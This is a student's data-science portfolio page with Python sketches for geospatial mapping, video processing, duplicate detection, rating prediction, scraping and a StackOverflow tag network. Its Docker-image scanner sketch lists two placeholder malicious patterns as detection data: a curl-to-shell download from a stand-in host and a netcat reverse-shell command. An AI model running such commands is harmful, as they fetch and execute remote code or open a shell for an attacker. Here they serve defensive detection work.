I first became interested in the applications of data and technology as a Neuroscience student. This led me to extend my studies to Computer Science, with coursework focused on data science.
I was a summer intern at StratoDem, a real-estate consulting startup that uses demographic data to build predictive solutions for investors and businesses.
I worked on a team of analysts, using data-mining tools to build predictive models from real-estate and government demographic data.
During my internship, I developed Stratplotlib, a Python tool that gave the team an easy way to create maps and visualize geospatial data.
An example use case is sketched below.
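Stratplotlib was an internal tool, so this is only a sketch of the kind of interface it offered; the `StratMap` class, its methods, and the column names are illustrative rather than the actual API.

```python
# Hypothetical usage sketch -- Stratplotlib was internal, so the class,
# methods, and columns below are illustrative, not the real API.
import pandas as pd

from stratplotlib import StratMap  # hypothetical import path

# County-level demographic estimates (columns assumed for illustration)
df = pd.read_csv("county_demographics.csv")  # fips, lat, lon, median_income

m = StratMap(basemap="light")             # create a base map
m.add_choropleth(df, key="fips",          # shade counties by a metric
                 value="median_income")
m.add_markers(df, lat="lat", lon="lon")   # overlay point locations
m.save("median_income_map.html")          # export an interactive map
```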
As a research assistant, I was responsible for manually analyzing videos for neuroscience research. This was my first encounter with programming in the workplace: I saw room for improvement and wrote Python automations that significantly increased analysis speed.
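The scripts themselves stayed with the lab, but the idea was along these lines; a minimal sketch assuming OpenCV (`cv2`), with the per-frame measurement chosen purely for illustration:

```python
# Sketch of the batch-processing idea, assuming OpenCV (cv2) is installed.
# The per-frame measurement (mean pixel intensity) is illustrative; the
# real scripts computed lab-specific metrics.
import glob

import cv2
import pandas as pd

rows = []
for path in glob.glob("videos/*.mp4"):
    cap = cv2.VideoCapture(path)
    frame_idx = 0
    while True:
        ok, frame = cap.read()
        if not ok:  # end of video
            break
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        rows.append({"video": path, "frame": frame_idx,
                     "mean_intensity": gray.mean()})
        frame_idx += 1
    cap.release()

pd.DataFrame(rows).to_csv("frame_measurements.csv", index=False)
```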
Python (pandas, numpy, scikit-learn, scipy, NetworkX, matplotlib, seaborn, Selenium, etc.), SQL, HTML/CSS
Natural Language Processing, stream sampling, search with hashing, principal component analysis and dimensionality reduction
Agile-driven development, AWS, web scraping, LaTeX, Linux, Git, Jupyter Notebook
Implemented an efficient way to find duplicate book documents in large volumes of data using locality-sensitive hashing and sampling.
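The code for this isn't public, but the core of the technique, MinHash signatures bucketed with LSH banding, can be sketched minimally; the shingle size, band counts, and toy documents below are illustrative:

```python
# Minimal sketch of near-duplicate detection with MinHash + LSH banding.
# Documents whose shingle sets are similar agree on all rows of at least
# one band with high probability, so only candidates are compared.
import random
from collections import defaultdict
from itertools import combinations

NUM_HASHES, BANDS = 100, 20        # 20 bands x 5 rows per band
ROWS = NUM_HASHES // BANDS
P = (1 << 61) - 1                  # large prime for the hash family
random.seed(0)
COEFFS = [(random.randrange(1, P), random.randrange(P))
          for _ in range(NUM_HASHES)]

def shingles(text, k=5):
    """Set of overlapping character k-grams."""
    return {text[i:i + k] for i in range(max(1, len(text) - k + 1))}

def minhash_signature(sh):
    """One min value per hash function h(x) = (a*x + b) mod P."""
    return [min((a * hash(s) + b) % P for s in sh) for a, b in COEFFS]

def candidate_duplicates(docs):
    """Documents sharing an identical band of their signature are candidates."""
    buckets = defaultdict(list)
    for name, text in docs.items():
        sig = minhash_signature(shingles(text))
        for band in range(BANDS):
            key = (band, tuple(sig[band * ROWS:(band + 1) * ROWS]))
            buckets[key].append(name)
    return {pair for names in buckets.values()
            for pair in combinations(sorted(set(names)), 2)}

docs = {
    "a": "the quick brown fox jumps over the lazy dog",
    "b": "the quick brown fox jumped over the lazy dog",
    "c": "an entirely different passage about something else",
}
print(candidate_duplicates(docs))  # 'a' and 'b' will very likely collide
```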
Built a model that predicts a user’s rating of a product by analyzing their review and comparing it to the ratings of similar reviews. This was done by building a TF-IDF vector from each user’s text and measuring its Euclidean distance to different review clusters.
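A hedged sketch of that pipeline with scikit-learn, using toy reviews and predicting via the mean rating of the nearest cluster; the exact clustering setup here is an assumption:

```python
# Sketch of the rating-prediction idea: vectorize reviews with TF-IDF,
# cluster them, and predict a new review's rating as the mean rating of
# its nearest cluster. Reviews and ratings here are toy data.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import euclidean_distances

reviews = ["loved it, great quality", "terrible, broke in a day",
           "great product, works well", "awful experience, do not buy"]
ratings = np.array([5, 1, 5, 1])

vec = TfidfVectorizer()
X = vec.fit_transform(reviews)

km = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)
cluster_mean_rating = {c: ratings[km.labels_ == c].mean()
                       for c in range(km.n_clusters)}

new = vec.transform(["really great, would buy again"]).toarray()
nearest = euclidean_distances(new, km.cluster_centers_).argmin()
print(cluster_mean_rating[nearest])  # predicted rating for the new review
```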
Worked on a team of engineers to develop a tool that finds suspicious code in Docker images. Intended for use in data centers, the tool works by mining security data from containers and then using similarity matching to find malicious code snippets in the file binaries. (Mentored by IBM.)
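The tool itself isn't public; conceptually, the matching step compares content extracted from a container's filesystem against known-bad snippets, roughly as below. The snippet list, threshold, and use of difflib are placeholders for the real mined data and matcher.

```python
# Conceptual sketch of the matching step: compare lines extracted from a
# container's files against known-malicious snippets. The snippets and
# threshold are placeholders; the real tool mined them from security data.
import difflib
from pathlib import Path

MALICIOUS_SNIPPETS = ["curl http://evil.example/payload | sh",
                      "nc -e /bin/sh"]  # placeholder examples

def suspicious_files(root, threshold=0.8):
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_bytes().decode("utf-8", errors="ignore")
        for line in text.splitlines():
            for snippet in MALICIOUS_SNIPPETS:
                ratio = difflib.SequenceMatcher(
                    None, line.strip(), snippet).ratio()
                if ratio >= threshold:
                    hits.append((str(path), snippet, round(ratio, 2)))
    return hits

# Run against an exported image filesystem, e.g.:
#   docker export $(docker create some-image) | tar -x -C ./image-fs
print(suspicious_files("./image-fs"))
```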
Built a model that predicts the relationship between two YouTube videos (i.e., whether they are linked) by analyzing shortest-path metrics in a constructed YouTube graph. Computations ran multi-processed on a remote AWS instance.
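A minimal sketch of the feature-extraction step with networkx and multiprocessing, on a toy graph standing in for the real YouTube data:

```python
# Sketch: for candidate video pairs, compute shortest-path distance in a
# toy related-videos graph, in parallel. On the real project this ran
# multi-processed on an AWS instance over a much larger graph.
from multiprocessing import Pool

import networkx as nx

G = nx.Graph()  # nodes are video ids, edges are "related video" links
G.add_edges_from([("a", "b"), ("b", "c"), ("c", "d"), ("a", "e")])

def path_features(pair):
    u, v = pair
    try:
        dist = nx.shortest_path_length(G, u, v)
    except nx.NetworkXNoPath:
        dist = -1  # sentinel for disconnected pairs
    return u, v, dist

if __name__ == "__main__":
    pairs = [("a", "d"), ("e", "c"), ("a", "b")]
    with Pool(processes=4) as pool:
        print(pool.map(path_features, pairs))
```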
Web-scraped all of Boston's hotel reviews to build a model of the factors that influenced people's ratings.
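The scraper was site-specific; a generic sketch with requests and BeautifulSoup looks like this, where the URL and CSS selectors are placeholders:

```python
# Generic scraping-loop sketch, assuming requests + BeautifulSoup.
# The URL and selectors are placeholders; real review-site markup differs.
import requests
from bs4 import BeautifulSoup

def scrape_reviews(base_url, pages):
    rows = []
    for page in range(1, pages + 1):
        html = requests.get(f"{base_url}?page={page}", timeout=10).text
        soup = BeautifulSoup(html, "html.parser")
        for review in soup.select("div.review"):  # placeholder selector
            rows.append({
                "rating": review.select_one(".rating").get_text(strip=True),
                "text": review.select_one(".body").get_text(strip=True),
            })
    return rows

# rows = scrape_reviews("https://example.com/boston-hotels/reviews", pages=5)
```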
Implemented a way of predicting user ratings by analyzing the number of sentiment-bearing words in their reviews.
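A minimal sketch of that idea, with tiny hand-rolled sentiment lexicons and toy data standing in for the real ones:

```python
# Sketch of the sentiment-count feature: count lexicon words in a review
# and fit a simple regression from the counts to the rating. The word
# lists and data are illustrative stand-ins.
import re

import numpy as np
from sklearn.linear_model import LinearRegression

POSITIVE = {"great", "good", "love", "excellent", "amazing"}
NEGATIVE = {"bad", "terrible", "awful", "broken", "poor"}

def sentiment_counts(text):
    """Counts of positive and negative lexicon words in a review."""
    words = re.findall(r"[a-z']+", text.lower())
    return [sum(w in POSITIVE for w in words),
            sum(w in NEGATIVE for w in words)]

reviews = ["great product, love it", "terrible and broken",
           "good value", "awful, poor quality"]
ratings = np.array([5, 1, 4, 1])

X = np.array([sentiment_counts(r) for r in reviews])
model = LinearRegression().fit(X, ratings)
print(model.predict([sentiment_counts("love this, excellent stuff")]))
```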
Visualized the relationships between programming tools by constructing a network of “tags” associated with user questions on stackoverflow.com, in which a connection reflects how often one tag appears alongside another.
This project was done to better understand where different technologies fit in the grand scheme of things. I expected StackOverflow.com to provide an organic picture, given its importance in the tech community.
Making a connection out of a single post would look something like the above.
With a few million posts, I was able to get a much more descriptive visualization (below).
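For reference, the network construction behind these visualizations can be sketched with networkx, with toy posts standing in for the StackOverflow data dump:

```python
# Sketch of the network construction: each post contributes an edge
# between every pair of its tags, with edge weight counting how often
# the two tags co-occur. The posts list is toy data.
from itertools import combinations

import networkx as nx

posts = [["python", "pandas", "dataframe"],
         ["python", "numpy"],
         ["javascript", "html", "css"],
         ["python", "pandas"]]

G = nx.Graph()
for tags in posts:
    for u, v in combinations(sorted(tags), 2):
        if G.has_edge(u, v):
            G[u][v]["weight"] += 1   # seen together again: bump the weight
        else:
            G.add_edge(u, v, weight=1)

# Edge weights now encode how often two tags appear together:
print(G["pandas"]["python"]["weight"])  # 2
```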